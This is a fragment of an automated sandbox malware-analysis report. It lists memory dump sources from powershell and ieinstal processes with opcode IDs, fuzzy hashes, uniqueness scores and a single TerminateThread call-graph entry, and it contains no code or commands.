                                                • Opcode ID: 9b71d1f5cb9216507b653ee6a803f6948ede218b7f62563a8e7ed1bb0181298d
                                                • Instruction ID: 40e07c8eeab526f7b2b8c06429359e3ebd743b15b98036929459fe8a15aa9a5c
                                                • Opcode Fuzzy Hash: 9b71d1f5cb9216507b653ee6a803f6948ede218b7f62563a8e7ed1bb0181298d
                                                • Instruction Fuzzy Hash: AAB23B74A012189FDB65EFA4C894BDE77B2EF88305F1044EAD409AB350DF3A5E819F90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tP}l
                                                • API String ID: 0-1999695023
                                                • Opcode ID: 59d359b1129a09f5c2cf7ee0698b7b6fc00ef645980c7605ed5a35acfeaa8215
                                                • Instruction ID: d55f14f56a54384bd2f8c7467d747ea1c3e3e60f887f2c35163d101974145a4e
                                                • Opcode Fuzzy Hash: 59d359b1129a09f5c2cf7ee0698b7b6fc00ef645980c7605ed5a35acfeaa8215
                                                • Instruction Fuzzy Hash: D8B23B74A012189FDB65EFA4C894BDEB7B2EF88305F1044EAD409AB350DF3A5E819F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985397772.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8740000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $}l
                                                • API String ID: 0-3398354306
                                                • Opcode ID: 1c320cb791a351aa0cef4d573c3d505c6737287965077d6977cd7d602729a4bc
                                                • Instruction ID: a2dd96f9a4c039bac51089f027a67c9160d8d0cbf0387c34e0a8434ab362693d
                                                • Opcode Fuzzy Hash: 1c320cb791a351aa0cef4d573c3d505c6737287965077d6977cd7d602729a4bc
                                                • Instruction Fuzzy Hash: FC623778A042189FDB24DFA4C890BDE77B2EF89300F1144A9D109AB795DF39AE85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 268d0430bb9e3878ab26b8f44e8f53cca64e1a51b20c7b3a609db320b8955efa
                                                • Instruction ID: 0cf7d30b4d147f13d3050d5d9f9b207452d8d5d3d6ed1f1bd2eb5ebcf2ed628a
                                                • Opcode Fuzzy Hash: 268d0430bb9e3878ab26b8f44e8f53cca64e1a51b20c7b3a609db320b8955efa
                                                • Instruction Fuzzy Hash: E8D1BF79B002148FDB18EBB8C850AAEB7B3EFC8211B15856DE406DB355DF35DC068BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 15b056eea16f190debdfad083c46a6ac61a13601be9a6df74588dcdb3713f5a9
                                                • Instruction ID: c7598fcda5e285b70d34f2fcf74aea334fda8a737d4bb33590737ec5339afb29
                                                • Opcode Fuzzy Hash: 15b056eea16f190debdfad083c46a6ac61a13601be9a6df74588dcdb3713f5a9
                                                • Instruction Fuzzy Hash: 59C180747823447FF7166730EC52F2A3653ABC6B14F748469E701AF3D1D9B2A8868784
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9619bd14c775fcd13cdd05d242837d25949ba650e049a5ed3b1a5076d0a361f7
                                                • Instruction ID: e7f150c1d38fd88dfe772f83eeecfc8ab5955aa1ce1a1b52366aa132b47f33e2
                                                • Opcode Fuzzy Hash: 9619bd14c775fcd13cdd05d242837d25949ba650e049a5ed3b1a5076d0a361f7
                                                • Instruction Fuzzy Hash: CEC181747823447FF7166730EC52B2A3763ABC6B14F648469E701AF3D1D9B268868784
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4983617495.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_85e0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b4ed2f356d9766473dd2d388bcff7f94a2d309630bdc4a40c8d78a1d54b34b0
                                                • Instruction ID: 5b760d2c507330604403b6f43d978545d0f1a7e69426e77bebb0af9f41d9e733
                                                • Opcode Fuzzy Hash: 9b4ed2f356d9766473dd2d388bcff7f94a2d309630bdc4a40c8d78a1d54b34b0
                                                • Instruction Fuzzy Hash: 6B817B30B042859BDB19CFA5C8507EEBBB3BF84305F14846DE846AB395EB74D94ACB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage: 2.5%
                                                Dynamic/Decrypted Code Coverage: 0%
                                                Signature Coverage: 0%
                                                Total number of Nodes: 1
                                                Total number of Limit Nodes: 0
                                                Execution graph node 79: 63e26d (TerminateThread)

                                                Callgraph

                                                Control-flow Graph

                                                Control-flow graph node 0: 63e26d-63e289 (TerminateThread)
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.8454791006.0000000000630000.00000040.00000400.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_630000_ieinstal.jbxd
                                                Similarity
                                                • API ID: TerminateThread
                                                • String ID:
                                                • API String ID: 1852365436-0
                                                • Opcode ID: 44afa38f8e1ebdb2ea769f5f40b06a685890bdf2231cfaadeda5cd4dcfd7204a
                                                • Instruction ID: 15c4d3a731beb1d9c3e6be77de5a1846c92d149cf7f4b31ef804c75758a6f86a
                                                • Opcode Fuzzy Hash: 44afa38f8e1ebdb2ea769f5f40b06a685890bdf2231cfaadeda5cd4dcfd7204a
                                                • Instruction Fuzzy Hash: E4C09B5510170351E71419299DF77DE25532F551B1F5487348C6DDB0D5D77781855410
                                                Uniqueness

                                                Uniqueness Score: -1.00%